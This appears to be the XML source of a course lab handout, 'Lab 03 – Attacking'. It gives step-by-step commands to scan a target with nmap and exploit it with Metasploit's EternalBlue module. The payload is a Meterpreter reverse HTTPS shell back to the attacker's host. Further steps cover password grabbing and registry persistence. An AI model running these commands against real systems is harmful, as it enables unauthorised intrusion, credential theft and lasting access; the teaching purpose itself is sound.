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596D" w14:textId="6289D98A" w:rsidR="0B90F45A" w:rsidRDefault="0B90F45A" w:rsidP="0B90F45A">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lab </w:t>
      </w:r>
      <w:r w:rsidR="00983348">
        <w:t>03</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00983348">
        <w:t>Attacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C88911" w14:textId="77777777" w:rsidR="00DC3392" w:rsidRDefault="00DC3392" w:rsidP="00DC3392"/>
    <w:p w14:paraId="254729C6" w14:textId="39AA9F67" w:rsidR="007D3E8F" w:rsidRDefault="00983348" w:rsidP="0B90F45A">
      <w:r>
        <w:t xml:space="preserve">In this lab we’ll walk through a simple </w:t>
      </w:r>
      <w:r w:rsidR="007D3E8F">
        <w:t>exploitation of a system from start to finish. Some of the steps discussed on the attacker</w:t>
      </w:r>
      <w:r w:rsidR="0001610A">
        <w:t xml:space="preserve"> methodology will be skipped due to restrictions of the example.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B20729" w14:textId="05C99A72" w:rsidR="0001610A" w:rsidRDefault="0001610A" w:rsidP="0B90F45A"/>
    <w:p w14:paraId="2236C622" w14:textId="77C01B2E" w:rsidR="0001610A" w:rsidRDefault="0001610A" w:rsidP="0001610A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDFAD8C" w14:textId="76CFF5EF" w:rsidR="0001610A" w:rsidRDefault="0001610A" w:rsidP="0001610A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Scan the target machine using nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC9A337" w14:textId="1214E4DB" w:rsidR="0001610A" w:rsidRPr="0001610A" w:rsidRDefault="0001610A" w:rsidP="0001610A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0001610A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nmap -sT -sV -Pn -n -T4 &lt;ip address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58031863" w14:textId="3F7F014E" w:rsidR="0001610A" w:rsidRDefault="00F202A7" w:rsidP="0001610A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploit the target using Metasploit</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="70BE139B" w14:textId="1EE41ED2" w:rsidR="0001610A" w:rsidRPr="0001610A" w:rsidRDefault="0001610A" w:rsidP="0001610A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0001610A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506CCCC3" w14:textId="307F2C71" w:rsidR="0001610A" w:rsidRDefault="0001610A" w:rsidP="0001610A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Select exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D8AFD6" w14:textId="2A5439ED" w:rsidR="0001610A" w:rsidRPr="0001610A" w:rsidRDefault="0001610A" w:rsidP="0001610A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0001610A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>use exploit/windows/smb/ms17_010_</w:t>
      </w:r>
      <w:r w:rsidR="00FF7759">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EB0100" w14:textId="7417FD4C" w:rsidR="0001610A" w:rsidRDefault="0001610A" w:rsidP="0001610A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575D39C7" w14:textId="641ACC10" w:rsidR="0001610A" w:rsidRPr="0001610A" w:rsidRDefault="0001610A" w:rsidP="0001610A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0001610A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>set rhost &lt;ip address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73136D42" w14:textId="42AF181C" w:rsidR="0001610A" w:rsidRDefault="0001610A" w:rsidP="0001610A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523CB03B" w14:textId="053095AC" w:rsidR="0001610A" w:rsidRPr="0001610A" w:rsidRDefault="0001610A" w:rsidP="0001610A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0001610A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>set payload windows/x64/meterpreter/reverse_https</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7FE1A3" w14:textId="46C900A3" w:rsidR="0001610A" w:rsidRDefault="0001610A" w:rsidP="0001610A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282A41BC" w14:textId="134EA8C5" w:rsidR="0001610A" w:rsidRPr="0001610A" w:rsidRDefault="0001610A" w:rsidP="0001610A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0001610A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>set lhost &lt;local ip address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2391B846" w14:textId="53B2CFC2" w:rsidR="0001610A" w:rsidRDefault="0001610A" w:rsidP="0001610A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0001610A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>set lport 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD92277" w14:textId="466A43EE" w:rsidR="0001610A" w:rsidRDefault="0001610A" w:rsidP="0001610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Exploit!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3519F163" w14:textId="676AA927" w:rsidR="0001610A" w:rsidRDefault="00F202A7" w:rsidP="006F31F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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01610A" w:rsidRPr="0001610A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>xploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C0A4FE" w14:textId="77777777" w:rsidR="006F31F0" w:rsidRPr="0001610A" w:rsidRDefault="006F31F0" w:rsidP="006F31F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="596C064A" w14:textId="6E462493" w:rsidR="00FF7759" w:rsidRDefault="00FF7759" w:rsidP="00FF7759">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Internal reconnaissance </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F61324" w14:textId="64BE2AD1" w:rsidR="00FF7759" w:rsidRDefault="00FF7759" w:rsidP="00FF7759">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Check which user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7D8DD5" w14:textId="5814E48B" w:rsidR="00FF7759" w:rsidRDefault="00FF7759" w:rsidP="00FF7759">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Check where we landed on the filesystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A6D5F8" w14:textId="7D333954" w:rsidR="00314BA6" w:rsidRDefault="00314BA6" w:rsidP="00314BA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Grab passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312B3877" w14:textId="4D15C1D6" w:rsidR="00F202A7" w:rsidRDefault="00F202A7" w:rsidP="00314BA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Etc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A0CE1A" w14:textId="77777777" w:rsidR="00314BA6" w:rsidRDefault="00314BA6" w:rsidP="00314BA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D8F7095" w14:textId="6C7F89A9" w:rsidR="00314BA6" w:rsidRDefault="00314BA6" w:rsidP="00314BA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Setup persistence </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2373DCF7" w14:textId="7ED0236C" w:rsidR="00314BA6" w:rsidRDefault="00314BA6" w:rsidP="00314BA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Registry key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EBE398" w14:textId="412BE95D" w:rsidR="00314BA6" w:rsidRPr="00F202A7" w:rsidRDefault="00314BA6" w:rsidP="00314BA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F202A7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>use exploit/win</w:t>
      </w:r>
      <w:r w:rsidR="00F202A7" w:rsidRPr="00F202A7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>dows/local/registry_persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40821B7B" w14:textId="507D2B32" w:rsidR="00314BA6" w:rsidRDefault="00314BA6" w:rsidP="00314BA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set session (where our exploit was)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07741EB1" w14:textId="3F87EFF1" w:rsidR="00F202A7" w:rsidRPr="00F202A7" w:rsidRDefault="00314BA6" w:rsidP="00F202A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F202A7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>set session 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594C2EC9" w14:textId="5883E4E1" w:rsidR="00F202A7" w:rsidRDefault="00F202A7" w:rsidP="00F202A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploit!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F07C48" w14:textId="008EDA40" w:rsidR="00F202A7" w:rsidRPr="00F202A7" w:rsidRDefault="00F202A7" w:rsidP="00F202A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F202A7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF7EAD4" w14:textId="77777777" w:rsidR="007D3E8F" w:rsidRPr="00DC3392" w:rsidRDefault="007D3E8F" w:rsidP="0B90F45A"/>
    <w:p w14:paraId="21700732" w14:textId="4E1FC0A3" w:rsidR="002802E9" w:rsidRPr="00DC3392" w:rsidRDefault="002802E9" w:rsidP="0B90F45A"/>
    <w:p w14:paraId="37A3DC44" w14:textId="6558E4D5" w:rsidR="002802E9" w:rsidRPr="00DC3392" w:rsidRDefault="002802E9" w:rsidP="0B90F45A"/>
    <w:sectPr w:rsidR="002802E9" w:rsidRPr="00DC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801"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="65E0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E2E54"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3CF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C179F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ED8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92"/>
    <w:rsid w:val="0001610A"/>
    <w:rsid w:val="00054313"/>
    <w:rsid w:val="00132B48"/>
    <w:rsid w:val="001738B7"/>
    <w:rsid w:val="00175EF6"/>
    <w:rsid w:val="001E0613"/>
    <w:rsid w:val="002046CD"/>
    <w:rsid w:val="00214970"/>
    <w:rsid w:val="00215236"/>
    <w:rsid w:val="00261178"/>
    <w:rsid w:val="002802E9"/>
    <w:rsid w:val="002A4372"/>
    <w:rsid w:val="00314BA6"/>
    <w:rsid w:val="00337BD6"/>
    <w:rsid w:val="003F228F"/>
    <w:rsid w:val="0045294F"/>
    <w:rsid w:val="004607B8"/>
    <w:rsid w:val="004A020B"/>
    <w:rsid w:val="004B4431"/>
    <w:rsid w:val="00567D00"/>
    <w:rsid w:val="005C3B86"/>
    <w:rsid w:val="005C56C4"/>
    <w:rsid w:val="00696A14"/>
    <w:rsid w:val="006D3CAD"/>
    <w:rsid w:val="006E5138"/>
    <w:rsid w:val="006F31F0"/>
    <w:rsid w:val="007D3E8F"/>
    <w:rsid w:val="0089685E"/>
    <w:rsid w:val="0089753B"/>
    <w:rsid w:val="00932797"/>
    <w:rsid w:val="00953B30"/>
    <w:rsid w:val="00983348"/>
    <w:rsid w:val="009B33A1"/>
    <w:rsid w:val="009C4FFA"/>
    <w:rsid w:val="00A477B2"/>
    <w:rsid w:val="00A723D7"/>
    <w:rsid w:val="00B35AED"/>
    <w:rsid w:val="00B7786D"/>
    <w:rsid w:val="00BF001D"/>
    <w:rsid w:val="00BF16CF"/>
    <w:rsid w:val="00C07B0A"/>
    <w:rsid w:val="00C4551F"/>
    <w:rsid w:val="00CB432D"/>
    <w:rsid w:val="00DA0DA5"/>
    <w:rsid w:val="00DB74D9"/>
    <w:rsid w:val="00DC3392"/>
    <w:rsid w:val="00E822E7"/>
    <w:rsid w:val="00E9273B"/>
    <w:rsid w:val="00F202A7"/>
    <w:rsid w:val="00F24108"/>
    <w:rsid w:val="00FA102C"/>
    <w:rsid w:val="00FF7759"/>
    <w:rsid w:val="0B90F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B53"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{75954049-2AD4-46A8-B2FD-B2499F5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A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161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Welu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Flaagan, Tyler</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-05-29T20:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-29T22:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>